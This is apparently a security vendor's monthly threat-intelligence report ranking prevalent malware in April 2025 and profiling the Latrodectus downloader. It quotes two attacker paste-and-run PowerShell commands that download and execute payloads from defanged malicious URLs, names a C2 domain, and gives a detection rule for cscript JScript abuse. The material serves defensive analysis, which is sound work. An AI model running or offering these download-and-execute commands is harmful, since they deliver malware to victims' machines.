Highlights from April
Amber Albatross remains at number 1 on our top 10 most prevalent threat list this month. Amber Albatross is Red Canary’s name for a cluster of activity that starts from an adware program and leads to a pyInstaller EXE with stealer-like capabilities. Our ongoing research into this threat—including additional malware analysis and updated installer tracking—continues to improve our visibility, leading to a higher volume of published threats in April.
Briefly, it’s worth noting that SocGholish dropped out of the top 10 entirely for the first time since November 2023.
Latrodectus made its debut in the top 10 this month, and it’s no coincidence that it coincides with the U.S. tax season. Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, frequently leveraging financially-themed lures. You can read more about Latrodectus below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for April 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: | Threat description : Red Canary-named cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| Month's rank: ⬆ 2 | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
| Month's rank: ⬆ 3 | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 4 | Threat name: | Threat description : Red Canary's name for a VBS worm that is delivered via an infected USB and uses a printui DLL hijack to deliver a cryptomining payload |
| Month's rank: ⬇ 5 | Threat name: | Threat description : Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| Month's rank: ⬆ 6* | Threat name: Bondat | Threat description : Worm that is associated with cryptocurrency mining, as well as beaconing out to C2 and downloading additional payloads, that spreads via removable media running malicious JavaScript files |
| Month's rank: ⬆ 6* | Threat name: Latrodectus | Threat description : Downloader used by adversaries to execute arbitrary commands and deliver additional payloads |
| Month's rank: ⬆ 8* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Month's rank: ⬆ 8* | Threat name: Maya "vaccine" virus | Threat description : Worm-like virus that infects the Maya graphic design software created by Autodesk |
| Month's rank: ⬆ 8* | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Latrodectus weaves its web
Latrodectus made its debut in the top 10 this month and it’s no coincidence that it coincides with the US tax season. Latrodectus is a downloader used by adversaries to execute arbitrary commands and deliver additional payloads, frequently leveraging financially-themed lures. Proofpoint assesses that Latrodectus was written by the same developers as IcedID, based on similarities in the code. It was first reported in November 2023 being distributed by TA577 in a number of phishing campaigns. In January 2024, it was reportedly also being used by TA578.
Latrodectus has gone through several versions, the most recently reported being version 1.9 released in February 2025. It has a range of capabilities, including gathering system information and delivering additional payloads like IcedID. In May 2025, some samples reportedly went on to deliver LummaC2.
Latrodectus was one of the malware families targeted by Operation Endgame in May 2024, but the actors behind it rebuilt their infrastructure fairly quickly. It was in use again by late June 2024, observed by Red Canary and other researchers being dropped by Brute Ratel. Brute Ratel (aka BRC4) is a customized attack simulation tool designed to evade common defensive controls.
Latrodectus behavior to look out for
We observed a recent wave of Latrodectus activity begin in mid-March and increase until the end of April 2025. To give an example of what we saw in April, the first observed endpoint behavior was a PowerShell command reaching out to the URL https[:]//rgbw[.]live/
"PowerShell.exe" -WindowStyle Hidden -Command "$i = New-Object -ComObject WindowsInstaller.Installer;$i.UILevel = 2;$i.InstallProduct('https[:]//rgbw[.]live/','')"; Browser check identificate: 8006powershell -WindowStyle Hidden -Command "$i = New-Object -ComObject WindThe inclusion of the “Browser check identificate:”prompt and a subsequent change made to the RunMRU registry key indicates this likely uses a paste-and-run fake CAPTCHA lure for initial execution. Following a successful connection to https[:]//rgbw[.]live/, msiexec.exe, spawned the process NVIDIA Notification.exe that then loaded C:\Users\username\AppData\Roaming\nvidia\libcef.dll. This DLL is a Latrodectus payload that’s packaged with the legitimate DLL and uses sideloading to execute. The Latrodectus DLL reached out to architrata[.]com, which has also been identified as a Latrodectus C2 domain.
The above example doesn’t have Brute Ratel in the execution chain, but we did observe Brute Ratel leading to Latrodectus in March 2025. Based on OSINT reporting, at least two other campaigns delivered Latrodectus plus Brute Ratel this spring:
- Tax and IRS-themed phishing emails delivering malicious PDF attachments leading to URL redirects and script downloads
- Fake Windows 11 Pro download sites also leading to URL redirects and script downloads
Microsoft attributes both of these Latrodectus campaigns to the adversary they track as Storm-0249. It is not clear if the activity we observed was part of either of the above campaigns.
Since Latrodectus is frequently sideloaded or injected into a process like explorer.exe for execution, it can be challenging from an endpoint perspective to pinpoint malicious activity with high confidence as Latrodectus before it reaches out to known C2 infrastructure. That said, since it is typically delivered via a phish, a fake download, or another type of loader, there are a number of detection opportunities. As an example, a paste and run > Brute Ratel > Latrodectus threat we saw in March 2025 had this initial execution paste-and-run command:
powershell -Command "$f=Join-Path $env:TEMP 'car.txt'; curl.exe -s 'http[:]//lygpt[.]live/d/' -o $f; Start-Process -WindowStyle Hidden -FilePath 'cscript.exe' -ArgumentList '//E:jscript',$f" # ✔ ''Cloud Verification ID: 1090''Using cscript.exe to execute a command containing //e:Jscript in this way gives us a detection opportunity.
Detection opportunity: Instances of wscript.exe or cscript.exe to run/interpret malicious JScript payloads
The following pseudo-detection analytic identifies instances of wscript.exe or cscript.exe running/interpreting malicious JScript payloads as a means of evasion. Threats, as well as techniques like paste and run, can leverage this technique in an attempt to conceal execution. It is not very common for wscript.exe or cscript.exe to use the //e:Jscript flag on a file that does not contain a .js file extension.
process == ('wscript' || 'cscript')
&&
command_includes ('/e:jscript')
&&
command_excludes ('.js' || '.bat' || '.cmd' || * )Note: * is a placeholder for any additional exclusions your environment may need to reduce noise and increase fidelity
Related Articles
Critical vulnerability in SAP NetWeaver enables malicious file uploads